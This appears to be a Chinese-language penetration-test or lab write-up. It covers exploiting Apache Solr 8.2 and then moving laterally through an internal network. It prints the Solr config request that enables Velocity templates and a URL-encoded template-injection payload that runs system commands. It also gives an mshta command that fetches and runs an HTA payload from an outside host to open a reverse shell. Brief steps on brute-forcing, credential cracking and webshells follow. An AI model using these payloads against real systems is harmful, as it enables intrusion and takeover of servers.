信息收集

做了一个简单的信息收集

8.2 的版本，并且可以创建core ，不能修改debug 模式

web 渗透

默默打开了佩奇文档

前面几个都失败了

直接利用这个

POST /solr/test/config HTTP/1.1
Host: 

{

  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

使用paylod

命令执行成功

尝试反弹shell

1
2

/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x="")+%23set($rt=$x.class.forName("java.lang.Runtime"))+%23set($chr=$x.class.forName('java.lang.Character'))+%23set($str=$x.class.forName("java.lang.String"))+%23set($ex=$rt.getRuntime().exec("whoami"))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

使用msf hta_server

1	`mshta http://8.xxx.xxx.25:8080/zHiMoiaBTT.hta`

内网信息收集

网段信息
fscan 扫描

内网横向移动

开启代理

开启主机

开启客户端

代理成功
172.16.7.99
- 端口扫描
  1
  fscan64.exe -h 172.16.7.1/24
  发现存在nmap
- 浏览器开代理
  
  进入内网
- 爆破web path
  
  查看admin
  
  爆破一下
  
  发现爆破失败
  
  发现路径www.zip
- 代码审计
  
  查找密码
  
  尝试爆破
  
  失败，先放着，尝试使用其他方式
  
  找到新的
  
  爆破成功
  
  登录成功
- 写webshell
  
  连接antSword
  
  查看网段
  
  最后一个机子了